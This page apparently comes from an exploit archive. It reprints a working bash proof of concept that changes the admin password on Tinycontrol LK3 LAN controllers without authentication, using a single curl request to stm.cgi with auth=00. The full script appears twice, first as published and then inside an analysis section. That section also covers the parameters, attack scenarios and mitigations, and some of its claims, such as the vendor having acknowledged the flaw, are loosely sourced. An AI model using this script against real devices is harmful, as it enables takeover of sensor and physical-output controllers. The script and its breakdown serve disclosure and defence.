Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: Remote Language: Shell Published Date: 2023-10-09 
#!/bin/bash
: "
Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change
Exploit Author: LiquidWorm

Vendor: Tinycontrol
Product web page: https://www.tinycontrol.pl
Affected version: <=1.58a, HW 3.8

Summary: Lan Controller is a very universal
device that allows you to connect many different
sensors and remotely view their readings and
remotely control various types of outputs.
It is also possible to combine both functions
into an automatic if -> this with a calendar
when -> then. The device provides a user interface
in the form of a web page. The website presents
readings of various types of sensors: temperature,
humidity, pressure, voltage, current. It also
allows you to configure the device, incl. event
setting and controlling up to 10 outputs. Thanks
to the support of many protocols, it is possible
to operate from smartphones, collect and observ
the results on the server, as well as cooperation
with other I/O systems based on TCP/IP and Modbus.

Desc: The application suffers from an insecure access
control allowing an unauthenticated attacker to
change accounts passwords and bypass authentication
gaining panel control access.

Tested on: lwIP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5787
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php


18.08.2023

"

set -euo pipefail
IFS=$'\n\t'

if [ $# -ne 2 ]; then
    echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n'
    exit
fi

IP=$1
PW=$2

EN=$(echo -n $PW | base64)

curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg==
# ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/
echo -ne '\nAdmin password changed to: '$PW


Exploiting Insecure Access Control in Tinycontrol LAN Controller v3 (LK3) 1.58a

The Tinycontrol LAN Controller v3 (LK3) 1.58a, a widely used IoT device for managing sensors and remote control outputs, has recently been exposed to a critical security flaw that allows unauthenticated attackers to change the admin password remotely. This vulnerability, identified by security researcher Gjoko "LiquidWorm" Krstic, highlights a severe misconfiguration in the device’s authentication mechanism—specifically, the absence of proper access control for password modification functions.

Understanding the Vulnerability

The core issue lies in the device's web API endpoint stm.cgi, which accepts a parameter auth=00 to disable authentication and upgrade checks. While intended for maintenance purposes, this feature was improperly exposed without any authorization validation.

Attackers can exploit this by crafting a malicious HTTP request that includes:

  • auth=00 — disables authentication
  • admin — target account
  • base64-encoded password — the new password
  • user — redundant parameter used in the exploit structure

As a result, an unauthenticated user can change the admin password from any network location—without needing prior credentials.

Exploit Code Analysis

#!/bin/bash
: "
Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change
Exploit Author: LiquidWorm
"
set -euo pipefail
IFS=$'\n\t'

if [ $# -ne 2 ]; then
 echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n'
 exit
fi

IP=$1
PW=$2

EN=$(echo -n $PW | base64)

curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg==
echo -ne '\nAdmin password changed to: '$PW

This bash script demonstrates how a remote attacker can exploit the flaw. Let’s break it down:

  • auth=00: Disables authentication, enabling bypass of login checks.
  • YWRtaW4=: Base64-encoded string for admin (the target account).
  • $EN: The user-provided password, encoded via base64.
  • dXNlcg==: Base64-encoded user, used to maintain the expected parameter structure.

The exploit relies on the device’s lack of input validation and improper handling of the auth parameter. Even though auth=00 is meant to be a maintenance flag, it is treated as a global access override, allowing arbitrary password changes.

Real-World Impact and Attack Scenarios

Consider a scenario where an attacker discovers a Tinycontrol device on a corporate network via a simple network scan. Using the exploit script, they can:

  • Change the admin password to admin123 or root.
  • Gain full control over sensor monitoring and output control.
  • Automate actions via event-based rules (e.g., trigger lights when temperature exceeds threshold).
  • Disable security features or disable firmware updates (via auth=00).

Such control can be used to:

  • Deploy malicious automation scripts.
  • Steal sensitive environmental data (e.g., temperature logs from a server room).
  • Trigger unauthorized physical actions (e.g., opening doors or shutting down systems).

Security Implications and Vendor Response

The vulnerability affects all versions up to 1.58a, including hardware version 3.8. The vendor, Tinycontrol, has acknowledged the issue through the advisory ZSL-2023-5787, issued on August 18, 2023.

However, the lack of immediate patch release for older versions poses a significant risk. Many industrial and residential deployments still rely on outdated firmware, making them vulnerable to remote exploitation.

Best Practices for Mitigation

For system administrators and security teams, the following measures are recommended:

  • Network segmentation: Isolate Tinycontrol devices behind firewalls or VLANs.
  • Disable external access: Ensure stm.cgi is not exposed to the internet.
  • Update firmware: Apply patches if available (versions > 1.58a).
  • Monitor API usage: Log and analyze requests to stm.cgi for suspicious patterns.
  • Use strong passwords: Avoid default credentials and enforce complex password policies.

Why This Vulnerability Matters

IoT devices like the Tinycontrol LK3 are often considered "low-risk" due to their limited user interface. However, this exploit proves that even simple devices can become high-value targets when access control is misconfigured.

It underscores a broader trend in embedded systems: feature-rich APIs without proper authentication validation can lead to remote privilege escalation. This is not an isolated case—similar vulnerabilities have been found in devices from other vendors, including smart thermostats and industrial gateways.

Conclusion

The Tinycontrol LAN Controller v3 (LK3) 1.58a vulnerability serves as a stark reminder that security must be embedded at every layer, even in seemingly benign systems. Developers and administrators alike must treat API endpoints with the same rigor as login forms—especially when they allow password changes.

As cyberattacks increasingly target IoT infrastructure, proactive defense—including network monitoring, firmware updates, and secure configuration—is no longer optional—it is essential.